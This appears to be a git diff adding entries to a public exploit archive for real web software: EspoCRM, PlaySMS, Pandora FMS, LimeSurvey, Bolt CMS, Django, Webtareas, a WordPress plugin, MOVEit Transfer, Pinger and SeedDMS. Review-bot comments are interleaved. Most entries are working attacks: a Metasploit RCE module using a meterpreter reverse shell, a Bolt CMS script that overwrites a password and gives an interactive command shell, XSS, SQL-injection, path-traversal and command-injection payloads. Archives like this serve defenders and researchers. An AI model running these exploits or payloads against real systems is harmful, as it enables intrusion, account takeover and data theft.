+# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.espocrm.com
+# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip
+# Version: v5.8.5
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+-------------
+
+Details:
+--------------------------------------------
+
+1- When we sent a request to the /api/v1/App/user, we can see user details
+---
+First Request:
+---------------------------
+GET /api/v1/App/user HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 *************************
+Authorization: Basic *************************************
+Espo-Authorization: *************************************
+Espo-Authorization-By-Token: true
+X-Requested-With: XMLHttpRequest
+DNT: 1
+Connection: close
+Cookie: auth-token-secret=cdc7f7*********************377;
+auth-username=user1; auth-token=3a874a********************************48
+----
+
+2- When we decode Basic Authorization and Espo-Authorization and change the
+value with another username (like admin) in the first request, we can see
+other user information and access like BOSS
+----------
+
+3- Some Examples and encode technique
+
+- BASE64:
+First type: dXNlcjE6MQ== (user1:1)
+Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass)
\ No newline at end of file
diff --git a/exploits/php/remote/48335.rb b/exploits/php/remote/48335.rb
new file mode 100755
index 000000000..a75141519
--- /dev/null
+++ b/exploits/php/remote/48335.rb
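Review bot: Step 2 is too vague to reproduce: it says to decode `Authorization` and `Espo-Authorization` and swap in another username, but the two example encodings under step 3 show different formats (`user1:1` versus `user1:<token>`) and the text never states whether only the username part is changed while the token or password stays the same, nor which response proves the escalation. A concrete before/after pair — e.g. the exact `Espo-Authorization` value sent with `Espo-Authorization-By-Token: true` and the returned admin user object — would make the claim testable; as written a reader cannot tell whether the defect is a token that is not bound to its username or a password-authenticated user being able to impersonate another, and those have very different fixes.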
@@ -0,0 +1,153 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'PlaySMS index.php Unauthenticated Template Injection Code Execution', + 'Description' => %q{ + This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution + in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom + PHP template system called 'TPL' which is used in the PlaySMS template engine at + `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a + malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a + second time, results in code execution. + The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection. + + This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine. 
+ }, + 'Author' => + [ + 'Touhid M.Shaikh ', # Metasploit Module + 'Lucas Rosevear' # Found and Initial PoC by NCC Group + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2020-8644'], + ['URL', 'https://www.youtube.com/watch?v=zu-bwoAtTrc'], + ['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'php/meterpreter/reverse_tcp', + 'ENCODER' => 'php/base64' + }, + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'PlaySMS Before 1.4.3', {} ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2020-02-05' + ) + ) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'Base playsms directory path', '/']), + ] + ) + end + + def uri + return target_uri.path + end + + def check + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php') + }) + rescue StandardError + vprint_error('Unable to access the index.php file') + return CheckCode::Unknown + end + + if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login') + return Exploit::CheckCode::Appears + end + + return CheckCode::Safe + end + + # Send Payload in Login Request + def login + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login' + } + }) + + # Grabbing CSRF token from body + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine the CSRF token") if csrf.nil? 
+ vprint_good("X-CSRF-Token for login : #{csrf}") + + cookies = res.get_cookies + + vprint_status('Trying to send the payload in the username field...') + + # Encoded in base64 to avoid HTML TAGS which are filter by the Application which is also blocking semicolon(;), that is why we're using delete_suffix(';') + evil = "{{#{payload.encoded.delete_suffix(';')}}}" + + # Send Payload with cookies. + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + 'op' => 'login' + }.to_a.shuffle], + 'vars_post' => Hash[{ + 'X-CSRF-Token' => csrf, + 'username' => evil, + 'password' => '' + }.to_a.shuffle] + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # Request Status Check + if res.code == 302 + print_good('Payload successfully sent') + return cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Something went wrong") + end + end + + def exploit + cookies = login + vprint_status("Cookies here : #{cookies}") + # Execute Last Sent Username. + send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'cookie' => cookies, + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login' + } + }, 0) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47898.py b/exploits/php/webapps/47898.py index 4cd329aa0..46246b5c1 100755 --- a/exploits/php/webapps/47898.py +++ b/exploits/php/webapps/47898.py 
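Review bot: `check` dereferences `res.code` and `res.headers['Location'].include?(...)` without guarding for a nil response or a missing `Location` header, so a closed port or a 302 without that header raises `NoMethodError` instead of returning `CheckCode::Unknown`/`Safe` — the `rescue StandardError` only covers the request itself. Add `return CheckCode::Unknown unless res` after the request and compare with `res.headers['Location'].to_s.include?(...)`. In `login` the named capture of the CSRF regex looks truncated in this rendering (`(?[a-z0-9"]+)`); if the real source also lacks the `<csrf>` group name, `csrf` is an undefined local and the following `fail_with` line raises rather than reporting a missing token, and the `"` inside the character class looks unintended either way — worth confirming against the original.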
@@ -12,32 +12,32 @@ import requests import sys -if len(sys.argv) !=3D 6: +if len(sys.argv) != 6: print("[+] Usage : ./exploit.py target username password ip port") exit() -target =3D sys.argv[1] -username =3D sys.argv[2] -password =3D sys.argv[3] -ip =3D sys.argv[4] -port =3D int(sys.argv[5]) +target = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = int(sys.argv[5]) -request =3D requests.session() +request = requests.session() -login_info =3D { +login_info = { "nick": username, "pass": password, "login_button": "Login" } -login_request =3D request.post( - target+"/pandora_console/index.php?login=3D1", +login_request = request.post( + target+"/pandora_console/index.php?login=1", login_info, - verify=3DFalse, - allow_redirects=3DTrue + verify=False, + allow_redirects=True ) -resp =3D login_request.text +resp = login_request.text if "User not found in database" in resp: print("[-] Login Failed") @@ -47,7 +47,7 @@ else: print("[+] Sending crafted graph request ..") -body_request =3D { +body_request = { "date": "0", "time": "0", "period": "0", @@ -65,7 +65,6 @@ body_request =3D { "draw_button": "Draw" } -draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati= -on/netflow/nf_live_view&pure=3D0" +draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operati=on/netflow/nf_live_view&pure=0" print("[+] Check your netcat ;)") request.post(draw_url, body_request) \ No newline at end of file diff --git a/exploits/php/webapps/48289.txt b/exploits/php/webapps/48289.txt new file mode 100644 index 000000000..213de9367 --- /dev/null +++ b/exploits/php/webapps/48289.txt 
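Review bot: The rewritten `draw_url` in the `@@ -65,7 +65,6 @@` hunk still carries a quoted-printable artefact: the removed side shows the line soft-wrapped as `operati=` followed by `on/netflow`, and the new line joined the two pieces with the `=` kept, so it now sends `sec2=operati=on/netflow/nf_live_view`, which is not the Pandora FMS netflow controller the final `request.post(draw_url, body_request)` needs. It should read `draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0"`. The `=3D` to `=` repairs elsewhere in the file look complete.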
@@ -0,0 +1,30 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11456 + +# Vulnerability Details +Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel. +Vulnerable Parameter : "title" + + +# POC +POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1 +Host: TARGET +Content-Length: 374 +Cache-Control: max-age=0 +Origin: http://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D +Connection: close + +YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0= \ No newline at end of file diff --git a/exploits/php/webapps/48296.py b/exploits/php/webapps/48296.py new file mode 100755 index 000000000..9b3401a53 --- /dev/null +++ b/exploits/php/webapps/48296.py 
@@ -0,0 +1,167 @@ +# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution +# Date: 2020-04-05 +# Exploit Author: r3m0t3nu11 +# Vendor Homepage: https://bolt.cm/ +# Software Link: https://bolt.cm/ +# Version: up to date and 6.x +# Tested on: Linux +# CVE : not-yet-0day + +# last version + +# p0c + + +#!/usr/bin/python + +import requests +import sys +import warnings +import re +import os +from bs4 import BeautifulSoup +from colorama import init +from termcolor import colored + +init() + +print(colored(''' + ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ + ▄▄▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ +▐░░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ +▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ +▐░▌▐░▌▐░▌ +▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ +▐░▌▐░█▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ +▀▀▀▀▀▀▀▀▀█░▌ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░ +▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ +▄▄▄▄▄▄▄▄▄█░▌ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ +▐░▌▐░░░░░░░░░░░▌ + ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ + ▀▀▀▀▀▀▀▀▀▀▀ + +Pre Auth rce with low credintanl +By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) + + + +if len(sys.argv) != 4: + print((len(sys.argv))) + print((colored("[~] Usage : ./bolt.py url username password","red"))) + exit() +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] + + + +request = requests.session() +print((colored("[+] Retrieving CSRF token to submit the login +form","green"))) +page = request.get(url+"/bolt/login") +html_content = page.text +soup = BeautifulSoup(html_content, 'html.parser') +token = soup.findAll('input')[2].get("value") + +login_info = { + "user_login[username]": username, + "user_login[password]": password, + "user_login[login]": "", + "user_login[_token]": token + } + +login_request = 
request.post(url+"/bolt/login", login_info) +print((colored("[+] Login token is : {0}","green")).format(token)) + + + +aaa = request.get(url+"/bolt/profile") +soup0 = BeautifulSoup(aaa.content, 'html.parser') +token0 = soup0.findAll('input')[6].get("value") +data_profile = { +"user_profile[password][first]":"password", +"user_profile[password][second]":"password", +"user_profile[email]":"a@a.com", +"user_profile[displayname]":"", +"user_profile[save]":"", +"user_profile[_token]":token0 + +} +profile = request.post(url+'/bolt/profile',data_profile) + + + + +cache_csrf = request.get(url+"/bolt/overview/showcases") + +soup1 = BeautifulSoup(cache_csrf.text, 'html.parser') +csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token") + + +asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true") +soup2 = BeautifulSoup(asyncc.text, 'html.parser') +tables = soup2.find_all('span', class_ = 'entry disabled') + + +print((colored("[+] SESSION INJECTION ","green"))) +for all_tables in tables: + +f= open("session.txt","a+") +f.write(all_tables.text+"\n") +f.close() +num_lines = sum(1 for line in open('session.txt')) + +renamePostData = { +"namespace": "root", +"parent": "/app/cache/.sessions", +"oldname": all_tables.text, +"newname": "../../../public/files/test{}.php".format(num_lines), +"token": csrf + } +rename = request.post(url+"/async/folder/rename", renamePostData) + + + + +try: +url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) + +rev = requests.get(url1).text +r1 = re.findall('php',rev) + +r2 = r1[0] +if r2 == "php" : +fileINJ = "test{}".format(num_lines) + +print((colored("[+] FOUND : "+fileINJ,"green"))) + +except IndexError: +print((colored("[-] Not found.","red"))) + +new_name = 0 +while new_name != 'quit': +inputs = input(colored("Enter OS command , for exit 'quit' : +","green","on_red")) +if inputs == "quit" : +exit() +else: +a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) +aa = a.text +r11 = 
re.findall('...displayname";s:..:"([\w\s\W]+)',aa) + + +print((r11)[0]) + + + + +Greetz to : all my friends \ No newline at end of file diff --git a/exploits/php/webapps/48297.txt b/exploits/php/webapps/48297.txt new file mode 100644 index 000000000..bda2a8a0f --- /dev/null +++ b/exploits/php/webapps/48297.txt @@ -0,0 +1,18 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11455 + +# Vulnerability Details +# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey +# that allows an attacker to download arbitrary files. The file manager functionality will also +# delete the file after it is downloaded (if the web service account has permissions to do so), +# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file. +Vulnerable Parameter : "path" + + +# POC +https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd \ No newline at end of file diff --git a/exploits/php/webapps/48303.txt b/exploits/php/webapps/48303.txt new file mode 100644 index 000000000..d15f6555f --- /dev/null +++ b/exploits/php/webapps/48303.txt 
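Review bot: The header and the banner disagree about the precondition, and the header omits two destructive side effects of the script: the title says "Authenticated Remote Code Execution" and the script requires `username`/`password` and logs in first, yet the banner printed at startup says "Pre Auth rce", and the `Version: up to date and 6.x` line does not match the `3.7.0` in the title. Anyone triaging this entry needs the accurate precondition, so the banner text should drop "Pre Auth" and the Version line should name the version that was actually tested. Separately, the `data_profile` POST resets the logged-in user's password to `password` and e-mail to `a@a.com`, and the `/async/folder/rename` loop moves every session file out of `/app/cache/.sessions` while appending their names to a local `session.txt`; a header line such as `# Note: this PoC overwrites the account's password/e-mail and renames server session files — run only against a disposable lab instance` would make that explicit. A small code point: `fileINJ` is only bound inside the `try`, so if the `except IndexError` branch is taken the later `while` loop fails with a `NameError` instead of stopping, and the `open('session.txt')` used to count lines is never closed; an `exit()` in the `except` and a `with open(...)` would address both.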
@@ -0,0 +1,111 @@ +# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass +# Date: 2020-04-08 +# Exploit Author: Spad Security Group +# Vendor Homepage: https://www.djangoproject.com/ +# Software Link: https://pypi.org/project/Django/ +# Version: 3.0 =< +# Tested on: windows 10 +# Language: python3.8 + +# t.me/SpadSec +# Spad Security Group + + +from requests import Session +import sys +from bs4 import BeautifulSoup +from time import sleep +from colorama import Fore, Style +from random import choice +from os import name, system + +colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW] + + +def cleaner(): + if name == "nt": + system("cls") + else: + system("clear") + +def logo_printer(): + cleaner() + logo = r""" + \_______/ + `.,-'\_____/`-.,' + /`..'\ _ /`.,'\ + / /`.,' `.,'\ \ +/__/__/ \__\__\__ +\ \ \ / / / + \ \,'`._,'`./ / + \,'`./___\,'`./ + ,'`-./_____\,-'`. + / \ + """ + _logo_enumer = 0 + for char in logo: + sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}") + sys.stdout.flush() + _logo_enumer +=1 + sleep(0.005) + print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec") + +class DjangoCsrfMiddleWareBypass: + def __init__(self, url: str, username: str, password: str): + self.url = url + self.username = username + self.password = password + logo_printer() + self.cookies = {} + self.session = Session() + self.bypass() + + def spad_printer(self, string): + print("\n") + for char in string: + sys.stdout.write(char) + sys.stdout.flush() + sleep(0.05) + + def bypass(self): + global colors + _conn = self.session.get(self.url) + self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}") + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...") + for key, value in _conn.cookies.items(): + self.cookies[key] = value + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] 
{colors[1]}Bypassed Cookies ;)!") + + soup = BeautifulSoup(_conn.text, "lxml") + csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] + self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}") + + login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies) + if len(login.history) >= 2: + if login.history[1].is_redirect: + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in") + else: + self.spad_printer("[-] Error") + else: + if login.history: + if login.history[0].is_redirect: + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}") + for key, value in self.session.cookies.items(): + self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}") + else: + self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") + else: + self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") + +if __name__ == "__main__": + try: + url = sys.argv[1] + username = sys.argv[2] + password = sys.argv[3] + DjangoCsrfMiddleWareBypass(url, username, password) + except IndexError: + logo_printer() + for char in f"[!] python {sys.argv[0]} http://google.com username password": + sys.stdout.write(char) + sys.stdout.flush() + sleep(0.05) \ No newline at end of file diff --git a/exploits/php/webapps/48312.txt b/exploits/php/webapps/48312.txt new file mode 100644 index 000000000..c4a02318e --- /dev/null +++ b/exploits/php/webapps/48312.txt 
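Review bot: The title claims a Django CSRF token bypass, but the visible code performs the ordinary, intended CSRF flow: `bypass()` GETs the login page, reads the `csrfmiddlewaretoken` hidden input with BeautifulSoup, and POSTs it back together with the same session's cookies, which is exactly what the middleware requires from any legitimate client. No check is circumvented anywhere in the script, so as far as this file shows there is no vulnerability in Django here; the header should describe what the script does (scripted login with the served token) rather than assert a bypass, or the entry needs a description of the actual weakness it relies on. The `# Version: 3.0 =<` line is also garbled and should state a concrete affected range if one is claimed. Readers assessing exposure should not treat this entry as evidence that Django's CSRF protection is broken.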
@@ -0,0 +1,26 @@ +# Exploit Title: Webtateas 2.0 - Arbitrary File Read +# Date: 2020-04-12 +# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. +# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php +# Software Link: http://webtareas.sourceforge.net/general/home.php +# Version: Webtateas v2.0 +# Tested on: Windows +# CVE : N/A + +Vulnerable Request: +POST /webtareas/includes/general_serv.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 72 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/webtareas/general/home.php? +Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver +DNT: 1 + +action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini \ No newline at end of file diff --git a/exploits/php/webapps/48315.txt b/exploits/php/webapps/48315.txt new file mode 100644 index 000000000..cd87d86a0 --- /dev/null +++ b/exploits/php/webapps/48315.txt 
@@ -0,0 +1,28 @@ +# Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion +# Google Dork: N/A +# Date: 2020-04-13 +# Exploit Author: Daniel Monzón (stark0de) +# Vendor Homepage: http://davidlingren.com/ +# Software Link: https://wordpress.org/plugins/media-library-assistant/ +# Version: 2.81 +# Tested on: Windows 7 x86 SP1 +# CVE : CVE-2020-11731, CVE-2020-11732 + +----Local File Inclusion---------------------------- + +There is a file inclusion vulnerability in the mla-file-downloader.php file. Example: + +http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php + +Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication. + + +----Multiple Cross-Site-Scripting------------------- + +There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript. + +Note that this vulnerability requires authentication. + + + +Tested on Windows 7 Pro SP1 32-bit and Wordpress 5.3.2 \ No newline at end of file diff --git a/exploits/php/webapps/48316.txt b/exploits/php/webapps/48316.txt new file mode 100644 index 000000000..7d16a13e7 --- /dev/null +++ b/exploits/php/webapps/48316.txt 
@@ -0,0 +1,34 @@ +# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection +# Google Dork: inurl:human.aspx intext:moveit +# Date: 2020-04-12 +# Exploit Authors: Aviv Beniash, Noam Moshe +# Vendor Homepage: https://www.ipswitch.com/ +# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1 +# CVE : CVE-2019-16383 +# +# Related Resources: +# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability +# https://nvd.nist.gov/vuln/detail/CVE-2019-16383 + +# Description: +# The API call for revoking logon tokens is vulnerable to a +# Time based blind SQL injection via the 'token' parameter + +# MSSQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 32 + +token='; WAITFOR DELAY '0:0:10'-- + + +# MySQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 21 + +token=' OR SLEEP(10); \ No newline at end of file diff --git a/exploits/php/webapps/48323.txt b/exploits/php/webapps/48323.txt new file mode 100644 index 000000000..e6038c894 --- /dev/null +++ b/exploits/php/webapps/48323.txt 
@@ -0,0 +1,75 @@ +# Title: Pinger 1.0 - Remote Code Execution +# Date: 2020-04-13 +# Author: Milad Karimi +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A + +================================================================================ +Pinger 1.0 - Simple Pinging Webapp Remote Code Execution +================================================================================ +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Date: 2020.04.13 +# Author: Milad Karimi +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A +================================================================================ +# Description: +simple, easy to use jQuery frontend to php backend that pings various +devices and changes colors from green to red depending on if device is +up or down. + +# PoC : + +http://localhost/pinger/ping.php?ping=;echo '' >info.php +http://localhost/pinger/ping.php?socket=;echo '' >info.php + + +# Vulnerabile code: + + if(isset($_GET['ping'])){ + // if this is ever noticably slower, i'll pass it stuff when called + // change the good.xml to config.xml, good is what I use at $WORK + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['ping'] == ""){ + $host = "127.0.0.1"; + }else{ + $host = $_GET['ping']; + } + $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout + .' '.$host.' 
| grep received | awk \'{print $4}\'')); + $id = str_replace('.','_',$host); + + if(($out == "1") || ($out == "0")){ + echo json_encode(array("id"=>"h$id","res"=>"$out")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + if(isset($_GET['socket'])){ + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['socket'] == ""){ + $host = "127.0.0.1 80"; + }else{ + $host = str_replace(':',' ',$_GET['socket']); + } + $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1'); + $id = str_replace('.','_',$host); + $id = str_replace(' ','_',$id); + if(preg_match("/succeeded/",$out)){ + echo json_encode(array("id"=>"h$id","res"=>"1")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + ?> \ No newline at end of file diff --git a/exploits/php/webapps/48324.txt b/exploits/php/webapps/48324.txt new file mode 100644 index 000000000..b44c3167f --- /dev/null +++ b/exploits/php/webapps/48324.txt 
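Review bot: The advisory shows the root cause in the quoted `ping.php` source but offers no remediation: `$host` is taken from `$_GET['ping']` (and, after a `str_replace`, from `$_GET['socket']`) and concatenated directly into the `shell_exec()` command string, with only an empty-string check before it. A fix note would help maintainers and defenders: validate the input before use, e.g. `if (!filter_var($host, FILTER_VALIDATE_IP)) { exit; }` for the ping handler (or a strict hostname pattern), validate the socket host and port as separate values with the port cast to an integer, and pass each component through `escapeshellarg()` when building the command. Logging or alerting on shell metacharacters in these two parameters is a useful detection signal while the code is unpatched.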
@@ -0,0 +1,352 @@ +# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.seeddms.org +# Software Link: https://www.seeddms.org/index.php?id=7 +# CVE: N/A + +Document Title: +=============== +SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2209 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2209 + + +Common Vulnerability Scoring System: +==================================== +4.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +SeedDMS is a free document management system with an easy to use web +based user interface. It is based on PHP and +MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of +development has made it a mature, powerful +and enterprise ready platform for sharing and storing 